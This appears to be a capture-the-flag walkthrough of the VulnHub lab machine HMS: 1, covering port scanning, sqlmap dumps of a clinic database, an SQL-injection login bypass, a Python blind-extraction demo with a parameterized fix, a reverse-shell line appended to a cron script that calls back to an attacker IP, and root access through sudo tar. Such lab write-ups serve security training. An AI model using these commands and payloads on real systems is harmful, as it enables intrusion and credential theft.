- Name: HMS?: 1
- Chinese name: Huh?: 1
- Published on July 28, 2021
- Difficulty: Easy
- Description: runs on VirtualBox, not VMware
- Download: https://www.vulnhub.com/entry/hms-1,728/
Author: AILX10
1. Host discovery: the target is 192.168.199.149
2. Port scanning: the default scan shows only 21 (FTP) and 22 (SSH)
3. Anonymous FTP login works, but the share is empty (nothing to take)
4. Re-scan all 65535 ports (21, 22, 7080). The first scan only covered nmap's default port list, which missed 7080; a full sweep finds it:
nmap -sS 192.168.199.149 -p1-65535
5. Visit the web application on port 7080
6. Proxy the browser through Burp and submit a login attempt to capture the request
7. Test the login form for SQL injection: it is injectable
8. Confirm and exploit with sqlmap, feeding it the captured POST body
1. Enumerate the current database
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" --current-db
current database: 'clinic_db'
2. Enumerate the tables in clinic_db
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db --tables
[24 tables]
+----------------------+
| user |
| admin |
| appointment |
| billing |
| billing_records |
| department |
| doctor |
| doctor_timings |
| manage_website |
| medicine |
| orders |
| patient |
| payment |
| prescription |
| prescription_records |
| room |
| service_type |
| tbl_email_config |
| tbl_permission |
| tbl_permission_role |
| tbl_role |
| tbl_sms_config |
| treatment |
| treatment_records |
+----------------------+
3. Enumerate the columns of the admin table
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db -T admin --columns
Database: clinic_db
Table: admin
[17 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| addr | varchar(500) |
| created_on | date |
| delete_status | int(11) |
| dob | text |
| fname | varchar(50) |
| gender | varchar(500) |
| id | int(11) |
| image | varchar(2000) |
| last_login | date |
| lname | varchar(500) |
| loginid | varchar(30) |
| mobileno | text |
| notes | varchar(200) |
| password | varchar(100) |
| role_id | int(11) |
| updated_on | date |
| username | varchar(500) |
+---------------+---------------+
4. Dump the admin credentials
sqlmap -u "http://192.168.199.149:7080/login.php" --data="user=admin&email=ailx10%40qq.com&password=123456&btn_login=" -D clinic_db -T admin -C username,password --dump
Database: clinic_db
Table: admin
[1 entry]
+----------+------------------------------------------------------------------+
| username | password |
+----------+------------------------------------------------------------------+
| admin | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357 |
+----------+------------------------------------------------------------------+
9. The same technique dumps the doctor and patient tables (commands omitted). Every hash is 64 hex characters, i.e. 256 bits, consistent with unsalted SHA-256; the doctor and the patient have identical hashes, which with an unsalted hash means they share the same password:
+-----------------+------------------------------------------------------------------+
| doctorname | password |
+-----------------+------------------------------------------------------------------+
| Dr. Akash Ahire | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |
+-----------------+------------------------------------------------------------------+
+-------------+------------------------------------------------------------------+
| patientname | password |
+-------------+------------------------------------------------------------------+
| Atul Petkar | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 |
+-------------+------------------------------------------------------------------+
10. Try a SQL-injection login bypass (the classic "universal password" payload) in Burp: put an always-true injection in the email field instead of an address, and the login succeeds without knowing the password.
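The two things the walkthrough does with this form, shown as an added example that is not part of the original write-up or of the HMS application's code: the login bypass through the email field (step 10), and boolean-based blind extraction of the admin password hash one hex digit at a time, which is how sqlmap dumps a table when all it gets back is a true/false difference (steps 7 and 8). The SQLite schema, the loginid value and the shape of login.php's query are assumptions; only the hash value is taken from the page. A parameterized version of the same query is included to show that both attacks fail against it.

```python
import hashlib
import sqlite3

# Constructed stand-in for clinic_db.admin: the columns the walkthrough
# dumped plus an assumed loginid. The hash value is the one sqlmap recovered.
ADMIN_HASH = "aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357"
HEX = "0123456789abcdef"
BYPASS_EMAIL = "' OR 1=1 -- "   # "universal password" style payload


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER, loginid TEXT, username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES (1, 'admin@hms.local', 'admin', ?)", (ADMIN_HASH,))
    return db


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def login_vulnerable(db, email, password):
    # Assumed shape of login.php: the email is spliced into the SQL string,
    # the password is hashed first, so only the email is injectable.
    sql = ("SELECT id FROM admin WHERE loginid = '%s' AND password = '%s'"
           % (email, sha256_hex(password)))
    return db.execute(sql).fetchone() is not None


def login_fixed(db, email, password):
    # Hardened form: bound parameters, so user input can never become SQL.
    sql = "SELECT id FROM admin WHERE loginid = ? AND password = ?"
    return db.execute(sql, (email, sha256_hex(password))).fetchone() is not None


def ask(login, db, condition):
    # One boolean-based blind request: the login succeeds iff `condition`
    # is true, because the rest of the WHERE clause is commented out.
    return login(db, "x' OR (%s) -- " % condition, "irrelevant")


def extract_admin_hash(db, login, length=64):
    # Recover admin.password one hex digit at a time, the way sqlmap's
    # boolean-based technique does it: at most 16 requests per position.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            cond = ("(SELECT substr(password, %d, 1) FROM admin "
                    "WHERE username = 'admin') = '%s'" % (pos, ch))
            if ask(login, db, cond):
                recovered += ch
                break
        else:
            return None   # no digit matched: the oracle is not leaking
    return recovered


def demo():
    db = make_db()
    return {
        "bypass_vulnerable": login_vulnerable(db, BYPASS_EMAIL, "anything"),
        "bypass_fixed": login_fixed(db, BYPASS_EMAIL, "anything"),
        "dump_vulnerable": extract_admin_hash(db, login_vulnerable),
        "dump_fixed": extract_admin_hash(db, login_fixed),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The blind dump needs roughly a thousand requests for one 64-character hash, which is why sqlmap's output looks slow when only a boolean channel is available; against the parameterized query the payload is matched as a literal loginid, the oracle never answers true, and `extract_admin_hash` gives up on the first position.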
11. View the page source of the authenticated application
12. Visit the page found there
13. Upload a reverse shell through the application's upload function
14. The reverse shell connects back: initial foothold as the web server user
15. Find the user flag
16. Look for SUID files (2>/dev/null would also silence the permission errors without the grep):
find / -perm -u=s -type f -exec ls -al {} \; 2>&1 | grep -v "Permission denied"
17. at: no permission, nothing usable there
18. Check scheduled tasks: a cron job runs a backup script in eren's home directory
$ cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
19. Move to eren: the script is writable from the current shell and is executed by cron as eren, so append a reverse shell to it and wait for the next run (about 5 minutes)
echo "bash -i >& /dev/tcp/192.168.199.247/7777 0>&1" >> /home/eren/backup.sh
After about 5 minutes the listener on 192.168.199.247:7777 receives a shell as eren
20. Escalate to root through tar and read the root flag. This relies on a sudo rule that lets eren run tar as root (the sudo -l output is not shown here); GNU tar's --checkpoint-action=exec runs the given command with tar's privileges, so the spawned bash is root's:
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
That completes the exercise.
Article published 2022-08-28 19:08